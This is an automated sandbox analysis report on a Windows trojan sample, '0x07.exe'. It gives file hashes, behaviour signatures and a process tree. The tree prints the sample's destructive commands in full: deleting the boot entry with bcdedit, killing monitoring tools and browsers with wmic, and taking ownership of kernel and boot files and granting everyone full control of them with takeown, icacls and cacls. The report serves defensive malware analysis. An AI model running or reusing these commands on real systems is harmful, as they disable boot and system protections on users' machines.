Resubmissions

09-05-2023 19:22

230509-x3fn4adg58 10

09-05-2023 19:14

230509-xxsrgaff7x 10

09-05-2023 19:14

230509-xxr5yadg42 7

09-05-2023 19:14

230509-xxrt6sff7w 8

09-05-2023 19:14

230509-xxrjeaff7v 8

09-05-2023 19:14

230509-xxqxwadg39 7

09-05-2023 19:14

230509-xxql4sff7t 10

09-05-2023 19:14

230509-xxqbcadg38 7

09-05-2023 19:10

230509-xvl6xadf64 10

Analysis

  • max time kernel
    99s
  • max time network
    36s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    09-05-2023 19:22

General

  • Target

    trojan-leaks-main/0x07.exe

  • Size

    247KB

  • MD5

    733eb0ab951ae42a8d8cca413201e428

  • SHA1

    640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1

  • SHA256

    52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb

  • SHA512

    c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f

  • SSDEEP

    3072:xaWEHnqlm+0FEaJSq6+ouCpk2mpcWJ0r+QNTBfZnazJ9k3kxMC+89+aPyXiwQ9M1:cWCMm8aMldk1cWQRNTBhz3Yz/qc9M1

Malware Config

Signatures

  • Possible privilege escalation attempt 25 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 25 IoCs
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\0x07.exe
    "C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\0x07.exe"
    1⤵
    • Loads dropped DLL
    • Writes to the Master Boot Record (MBR)
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Windows\Temp\winconfig.exe
      "C:\Windows\Temp\winconfig.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1480
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE79.tmp\AE7A.tmp\AE7B.bat C:\Windows\Temp\winconfig.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:660
        • C:\Users\Admin\AppData\Roaming\DetectKey.exe
          "C:\Users\Admin\AppData\Roaming\DetectKey.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:1416
        • C:\Windows\system32\bcdedit.exe
          bcdedit /delete {current}
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:1760
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic process where name='taskmgr.exe' delete /nointeractive
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:636
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic process where name='perfmon.exe' delete /nointeractive
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1684
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic process where name='mmc.exe' delete /nointeractive
          4⤵
            PID:1500
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process where name='PartAssist.exe' delete /nointeractive
            4⤵
              PID:1020
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic process where name='control.exe' delete /nointeractive
              4⤵
                PID:1152
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic process where name='ProcessHacker.exe' delete /nointeractive
                4⤵
                  PID:820
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic process where name='Security Task Manager.exe' delete /nointeractive
                  4⤵
                    PID:1460
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic process where name='Security Task Manager Protable.exe' delete /nointeractive
                    4⤵
                      PID:1464
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic process where name='CCleaner.exe' delete /nointeractive
                      4⤵
                        PID:1816
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic process where name='procexp.exe' delete /nointeractive
                        4⤵
                          PID:588
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic process where name='procexp64.exe' delete /nointeractive
                          4⤵
                            PID:2040
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic process where name='procexp64a.exe' delete /nointeractive
                            4⤵
                              PID:1608
                            • C:\Windows\System32\Wbem\WMIC.exe
                              wmic process where name='logonui.exe' delete /nointeractive
                              4⤵
                                PID:1980
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic process where name='regedit.exe' delete /nointeractive
                                4⤵
                                  PID:268
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic process where name='iexplore.exe' delete /nointeractive
                                  4⤵
                                    PID:1956
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic process where name='chrome.exe' delete /nointeractive
                                    4⤵
                                      PID:1804
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic process where name='firefox.exe' delete /nointeractive
                                      4⤵
                                        PID:1636
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic process where name='opera.exe' delete /nointeractive
                                        4⤵
                                          PID:1440
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic process where name='edge.exe' delete /nointeractive
                                          4⤵
                                            PID:1572
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic process where name='msedge.exe' delete /nointeractive
                                            4⤵
                                              PID:1880
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic process where name='brave.exe' delete /nointeractive
                                              4⤵
                                                PID:1932
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic process where name='wmplayer.exe' delete /nointeractive
                                                4⤵
                                                  PID:1160
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic process where name='notepad.exe' delete /nointeractive
                                                  4⤵
                                                    PID:1632
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic process where name='notepad++.exe' delete /nointeractive
                                                    4⤵
                                                      PID:1896
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic process where name='taskmgr.exe' delete /nointeractive
                                                      4⤵
                                                        PID:1996
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic process where name='perfmon.exe' delete /nointeractive
                                                        4⤵
                                                          PID:1044
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic process where name='logonui.exe' delete /nointeractive
                                                          4⤵
                                                            PID:1584
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic process where name='ProcessHacker.exe' delete /nointeractive
                                                            4⤵
                                                              PID:1724
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\taskmgr.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:520
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\hal.dll"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:1596
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\winload.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:1100
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\ntoskrnl.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:1956
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\perfmon.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:316
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\resmon.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:1352
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\logonui.exe
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:552
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\taskkill.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:876
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\tasklist.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:1684
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\tskill.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:1472
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\logonui.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:1476
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Program Files\Process Hacker 2"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:1440
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\System32\drivers"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:1216
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic process where name='taskmgr.exe' delete /nointeractive
                                                              4⤵
                                                                PID:1784
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic process where name='perfmon.exe' delete /nointeractive
                                                                4⤵
                                                                  PID:908
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic process where name='logonui.exe' delete /nointeractive
                                                                  4⤵
                                                                    PID:612
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic process where name='ProcessHacker.exe' delete /nointeractive
                                                                    4⤵
                                                                      PID:284
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:848
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\hal.dll" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:1748
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\winload.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:2012
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:1816
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:1924
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:1904
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:1996
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:1708
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:1704
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:964
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:1608
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:1220
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic process where name='taskmgr.exe' delete /nointeractive
                                                                      4⤵
                                                                        PID:1360
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic process where name='perfmon.exe' delete /nointeractive
                                                                        4⤵
                                                                          PID:268
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic process where name='logonui.exe' delete /nointeractive
                                                                          4⤵
                                                                            PID:856
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic process where name='ProcessHacker.exe' delete /nointeractive
                                                                            4⤵
                                                                              PID:1352
                                                                            • C:\Windows\system32\cacls.exe
                                                                              cacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
                                                                              4⤵
                                                                                PID:1920
                                                                              • C:\Windows\system32\cacls.exe
                                                                                cacls "C:\Windows\system32\hal.dll" /grant "everyone":F
                                                                                4⤵
                                                                                  PID:1476
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                  4⤵
                                                                                    PID:812
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                    4⤵
                                                                                      PID:1448
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                      4⤵
                                                                                        PID:1440
                                                                                      • C:\Windows\system32\cacls.exe
                                                                                        cacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
                                                                                        4⤵
                                                                                          PID:1408
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                          4⤵
                                                                                            PID:1068
                                                                                          • C:\Windows\system32\cacls.exe
                                                                                            cacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
                                                                                            4⤵
                                                                                              PID:1456
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                              4⤵
                                                                                                PID:1020
                                                                                              • C:\Windows\system32\cacls.exe
                                                                                                cacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
                                                                                                4⤵
                                                                                                  PID:528
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                  4⤵
                                                                                                    PID:1912
                                                                                                  • C:\Windows\system32\cacls.exe
                                                                                                    cacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
                                                                                                    4⤵
                                                                                                      PID:1960
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                      4⤵
                                                                                                        PID:296
                                                                                                      • C:\Windows\system32\cacls.exe
                                                                                                        cacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
                                                                                                        4⤵
                                                                                                          PID:1568
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                          4⤵
                                                                                                            PID:432
                                                                                                          • C:\Windows\system32\cacls.exe
                                                                                                            cacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
                                                                                                            4⤵
                                                                                                              PID:612
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                              4⤵
                                                                                                                PID:1564
                                                                                                              • C:\Windows\system32\cacls.exe
                                                                                                                cacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
                                                                                                                4⤵
                                                                                                                  PID:1764
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                  4⤵
                                                                                                                    PID:284
                                                                                                                  • C:\Windows\system32\cacls.exe
                                                                                                                    cacls "C:\Program Files\Process Hacker 2" /grant "everyone":F
                                                                                                                    4⤵
                                                                                                                      PID:1632
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                      4⤵
                                                                                                                        PID:2032
                                                                                                                      • C:\Windows\system32\cacls.exe
                                                                                                                        cacls "C:\Windows\System32\drivers" /grant "everyone":F
                                                                                                                        4⤵
                                                                                                                          PID:1720

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AE79.tmp\AE7A.tmp\AE7B.bat

                                                                                                                    Filesize

                                                                                                                    5KB

                                                                                                                    MD5

                                                                                                                    a645734f3bf4a2682cbaf546789ec0c4

                                                                                                                    SHA1

                                                                                                                    fafcc11909412bf51f217e12dfaa93a15181a3e2

                                                                                                                    SHA256

                                                                                                                    3b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0

                                                                                                                    SHA512

                                                                                                                    efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d

                                                                                                                  • C:\Users\Admin\AppData\Roaming\DetectKey.exe

                                                                                                                    Filesize

                                                                                                                    87KB

                                                                                                                    MD5

                                                                                                                    aba9a3cf4e1db4602c25405987b809a6

                                                                                                                    SHA1

                                                                                                                    6cd545ea023ce9cdfe76607c6801cc11ff7d9e80

                                                                                                                    SHA256

                                                                                                                    490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6

                                                                                                                    SHA512

                                                                                                                    e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675

                                                                                                                  • C:\Users\Admin\AppData\Roaming\DetectKey.exe

                                                                                                                    Filesize

                                                                                                                    87KB

                                                                                                                    MD5

                                                                                                                    aba9a3cf4e1db4602c25405987b809a6

                                                                                                                    SHA1

                                                                                                                    6cd545ea023ce9cdfe76607c6801cc11ff7d9e80

                                                                                                                    SHA256

                                                                                                                    490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6

                                                                                                                    SHA512

                                                                                                                    e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675

                                                                                                                  • C:\Windows\Temp\winconfig.exe

                                                                                                                    Filesize

                                                                                                                    139KB

                                                                                                                    MD5

                                                                                                                    11d457ee914f72a436fa4a8a8f8446dd

                                                                                                                    SHA1

                                                                                                                    d0308ca82ed9716b667e8e77e9ae013b9af44116

                                                                                                                    SHA256

                                                                                                                    c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef

                                                                                                                    SHA512

                                                                                                                    4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b

                                                                                                                  • \Windows\Temp\winconfig.exe

                                                                                                                    Filesize

                                                                                                                    139KB

                                                                                                                    MD5

                                                                                                                    11d457ee914f72a436fa4a8a8f8446dd

                                                                                                                    SHA1

                                                                                                                    d0308ca82ed9716b667e8e77e9ae013b9af44116

                                                                                                                    SHA256

                                                                                                                    c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef

                                                                                                                    SHA512

                                                                                                                    4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b